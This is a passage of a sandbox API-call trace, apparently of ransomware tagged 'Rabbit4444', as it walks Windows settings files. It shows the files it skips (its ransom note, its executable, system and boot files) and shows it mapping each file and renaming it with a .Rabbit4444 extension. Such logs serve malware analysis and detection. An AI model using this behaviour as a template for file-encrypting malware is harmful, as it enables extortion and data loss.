"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmoreoptions.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.577] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.577] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14788767479) returned 1 [0056.577] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1122) returned 1 [0056.577] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.577] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0056.577] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0056.578] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0056.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.580] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14789031336) returned 1 [0056.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0056.580] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.580] CloseHandle (hObject=0x298) returned 1 [0056.580] CloseHandle (hObject=0x278) returned 1 [0056.580] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms.Rabbit4444") returned 185 [0056.580] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmoreoptions.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmoreoptions.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.581] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6c24, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfb6c24, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", cAlternateFileName="AA05B3~1.SET")) returned 1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2=".") returned 1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="..") returned 1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="windows") returned -1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="boot") returned -1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.581] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.581] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms" | out: lpString1="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms") returned="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms" [0056.581] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.581] lstrlenW (lpString="AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms") returned 51 [0056.581] lstrlenW (lpString="Rabbit4444") returned 10 [0056.581] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.581] lstrlenW (lpString=".dll") returned 4 [0056.581] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.581] lstrlenW (lpString=".lnk") returned 4 [0056.581] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.581] lstrlenW (lpString=".ini") returned 4 [0056.581] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.582] lstrlenW (lpString=".sys") returned 4 [0056.582] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.582] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmouse.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.582] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.582] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14789281807) returned 1 [0056.582] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0056.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0056.582] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.583] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.584] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.584] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.584] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.584] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.584] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14789526230) returned 1 [0056.585] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.585] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0056.585] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.585] CloseHandle (hObject=0x298) returned 1 [0056.585] CloseHandle (hObject=0x278) returned 1 [0056.585] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms.Rabbit4444") returned 179 [0056.585] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmouse.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmouse.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.586] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1691857, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1691857, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", cAlternateFileName="AAEDFB~1.SET")) returned 1 [0056.592] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.592] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.592] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.592] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2=".") returned 1 [0056.592] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="..") returned 1 [0056.593] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="windows") returned -1 [0056.593] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.593] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.593] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="boot") returned -1 [0056.593] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.593] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.593] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms" | out: lpString1="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms") returned="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms" [0056.593] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.593] lstrlenW (lpString="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms") returned 54 [0056.593] lstrlenW (lpString="Rabbit4444") returned 10 [0056.593] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.593] lstrlenW (lpString=".dll") returned 4 [0056.593] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.593] lstrlenW (lpString=".lnk") returned 4 [0056.593] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.593] lstrlenW (lpString=".ini") returned 4 [0056.593] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.593] lstrlenW (lpString=".sys") returned 4 [0056.593] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessnarrator.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.594] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.594] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14790448582) returned 1 [0056.594] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1107) returned 1 [0056.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0056.594] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.595] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.596] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.596] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.596] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.596] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.596] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14790689514) returned 1 [0056.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0056.596] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.596] CloseHandle (hObject=0x298) returned 1 [0056.596] CloseHandle (hObject=0x278) returned 1 [0056.596] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms.Rabbit4444") returned 182 [0056.597] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessnarrator.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessnarrator.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.597] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d8c5a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x19d8c5a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageLockScreen.settingcontent-ms", cAlternateFileName="AA6364~1.SET")) returned 1 [0056.597] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.597] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2=".") returned 1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="..") returned 1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="windows") returned -1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="boot") returned -1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.598] lstrcmpiW (lpString1="AAA_SettingsPageLockScreen.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.598] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageLockScreen.settingcontent-ms" | out: lpString1="AAA_SettingsPageLockScreen.settingcontent-ms") returned="AAA_SettingsPageLockScreen.settingcontent-ms" [0056.598] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageLockScreen.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.598] lstrlenW (lpString="AAA_SettingsPageLockScreen.settingcontent-ms") returned 44 [0056.598] lstrlenW (lpString="Rabbit4444") returned 10 [0056.598] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.598] lstrlenW (lpString=".dll") returned 4 [0056.598] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.598] lstrlenW (lpString=".lnk") returned 4 [0056.598] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.598] lstrlenW (lpString=".ini") returned 4 [0056.599] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.599] lstrlenW (lpString=".sys") returned 4 [0056.599] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageLockScreen.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagelockscreen.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.599] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.599] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14790961360) returned 1 [0056.599] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1057) returned 1 [0056.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0056.599] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0056.599] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.600] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0056.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0056.601] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14791209234) returned 1 [0056.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0056.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0056.601] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.602] CloseHandle (hObject=0x298) returned 1 [0056.602] CloseHandle (hObject=0x278) returned 1 [0056.602] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageLockScreen.settingcontent-ms.Rabbit4444") returned 172 [0056.602] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageLockScreen.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagelockscreen.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageLockScreen.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagelockscreen.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.603] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a3706, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x22a3706, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x403, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageMaps.settingcontent-ms", cAlternateFileName="AA31EA~1.SET")) returned 1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2=".") returned 1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="..") returned 1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="windows") returned -1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.603] lstrcmpiW (lpString1="AAA_SettingsPageMaps.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.603] 